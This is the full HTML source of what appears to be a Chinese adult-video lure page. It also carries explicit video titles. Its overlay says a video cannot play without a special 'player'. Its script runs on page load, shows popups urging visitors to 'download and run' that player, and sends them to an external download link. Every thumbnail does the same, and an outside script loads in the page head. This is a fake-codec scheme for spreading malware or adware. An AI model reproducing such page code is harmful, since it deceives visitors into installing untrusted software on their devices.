<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script language="javascript" src="http://m.39lo.com/ios/ios.js"></script>
<meta http-equiv="Cache-Control" content="no-siteapp" />
<meta http-equiv="Content-Type" content="text/html; charset=gbk" />
<meta content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no" name="viewport">
<title>超性感美人妻私人服務 - 日本 - 木耳天下</title>
<style>
body{
	background-color: #000;
	margin: 0px;
	font-size: 12px;
	color: #EEE;
}
a{color: #EEE;}
img{
	border:none;
}
.wper{
	width:320px;
	margin:0 auto;
	color: #FFF;
}
.player{

	width:320px;
	height:300px;
	background-image: url(http://ww1.sinaimg.cn/large/005X3pXmjw1eovcjiq0m7j308w08cq2t.jpg);
	position:relative;
}

.player .title{
	height:20px;
	line-height:20px;
	text-align:5px;
}
#player{
	width:316px;
	height:238px;
	overflow:hidden;
	margin-left:2px;
}
#player img{
vertical-align:middle;
}
.player .quanping{
	display:block;
	height:40px;
}
#show{
	width:250px;
	height:150px;
	position:absolute;
	left:40px;
	top:60px;
	filter:alpha(Opacity=80);
	-moz-opacity:0.6;
	opacity: 0.6;
	z-index:100;
	background-color:#ffffff;
	color: #C60;
	font-size: 14px;
	line-height: 1.6em;
	z-index:999;
}
#show div{	padding:10px;}
.list .title{
	height:30px;
	line-height:30px;
}
.list .box{
	width:150px;
	border: 2px solid #CCC;
	overflow:hidden;
	line-height:18px;
	text-align:center;
	margin-right:5px;
	margin-bottom:5px;
	float:left;
}
.list .box img{
	width:150px;
	height:96px;
}
.more{
	text-align:center;
	font-size: 14px;
	font-weight: bold;
	color: #C30;
	padding:30px;
}
.more a{
	color: #C30;
	text-decoration: none;
}
</style>
</head>

<body>
<div class="wper">
<div class="player">
    	<div class="title">超性感美人妻私人服務</div>
        <div id="player">
  			<img src="http://ww2.sinaimg.cn/large/005X3nNxjw1eovdz23wflg308w0507wh.gif" width="320" height="200" />
  		</div>
        <a href="javascript:void(0);" onclick="javascript:down();" class="quanping"></a>
<div id="show">
       	  	<div>
        	无法正常播放，因为系统没有检测到您装有无毒无马速度快的《木耳专用播放器》。
            </div>
            <div style="text-align:center; padding:0px;">
            	<a href="http://clk.uunt.com/link/190308/11" onclick="javascript:down();"><img src="http://ww2.sinaimg.cn/large/005X4kGljw1eovcjiyx64g304m01gt8j.gif" width="166" height="52" /></a>
            </div>
    	</div>
    </div>
    
    <div class="list">
    	<div class="title">今日榜单</div>
    	<div class="box">
        	<a href="http://m.39lo.com/m2/app.html" onclick="javascript:down();">
        	<img src="http://m.39lo.com/m1/dow2/1.jpg" />
            22超美女-矢澤Rui
            </a>
        </div>
        <div class="box">
        	<a href="http://m.39lo.com/m2/app.html" onclick="javascript:down();">
        	<img src="http://m.39lo.com/m1/dow2/2.jpg" />
            公主也不想浪費的3P狩獵
            </a>
        </div>
        <div style="clear:both;"></div>
        <div class="box">
        	<a href="http://m.39lo.com/m2/app.html" onclick="javascript:down();">
        	<img src="http://m.39lo.com/m1/dow2/3.jpg" />
            美乳極品女の御客術
            </a>
        </div>
        <div class="box">
        	<a href="http://m.39lo.com/m2/app.html" onclick="javascript:down();">
        	<img src="http://m.39lo.com/m1/dow2/4.jpg" />
            慾望熟女2人組-里佳子
            </a>
        </div>
		<div style="clear:both;"></div>
    </div>
    <div class="more">
    	<a href="http://m.39lo.com/m2/app.html">今日新增影片56部，点此查看列表！</a>
    </div>
</div>
<script>
var FlashMdb = 'nHDLnHfknjTd&gp=401&time=nHnvnWDsPjc3n0|nHDvnHm4n1nL&gp=401&time=nHnvnWDsPjckP6|nHDvnHm4nWfL&gp=401&time=nHnvnWDsPjDLPf|nHDvnHm3rjmv&gp=401&time=nHnvnWDsPjDknf|nHDLnHfsnjT1&gp=401&time=nHnvnWDsPj0dns';
var fff = FlashMdb.split("|");
var ffcc = parseInt(fff.length * Math.random());
function play(){
	setTimeout(show,3100);
	document.getElementById("show").style.display = "none";
}
function show(){

	document.getElementById("show").style.display = "block";
	d('sp1');
	window.setTimeout("d('sp2')", 2600);
	
}
function down(){
	location.href = "http://clk.uunt.com/link/190308/11";
}
play();
function tant() {
    var ts = Math.floor(Math.random() * 5 + 1);
    if (ts == 1)
        xx = "提示：本站采用 ★特清播放器★ 点播，是否立刻下载运行观看？";
    if (ts == 2)
        xx = "提示：本站采用 ★VIP播放器★ 点播，是否立刻下载运行观看？";
    if (ts == 3)
        xx = "提示：本站采用 ★高清播放器★ 点播，是否立刻下载运行观看？";
    if (ts == 4)
        xx = "提示：本站采用 ★极速播放器★ 点播，是否立刻下载运行观看？";
    if (ts == 5)
        xx = "提示：本站采用 ★男人播放器★ 点播，是否立刻下载运行观看？";

    return xx;
}




function d(title) {
    alert(tant());
    window.location.href = down(title);
};

function down(tt) {
    var dd;

    var d1 = "http://clk.uunt.com/link/190308/11";
    var d2 = "http://clk.uunt.com/link/190308/11";

    if (tt == "sp1") {
        dd = d1;                //me
       
    }
    else if (tt == "sp2") {
        dd = d2;                         //me
        
    }





    return dd;
}
</script>
<span style="display:none">
<script src="http://s11.cnzz.com/stat.php?id=1254064432&web_id=1254064432" language="JavaScript"></script>
</span>
</body>
</html>
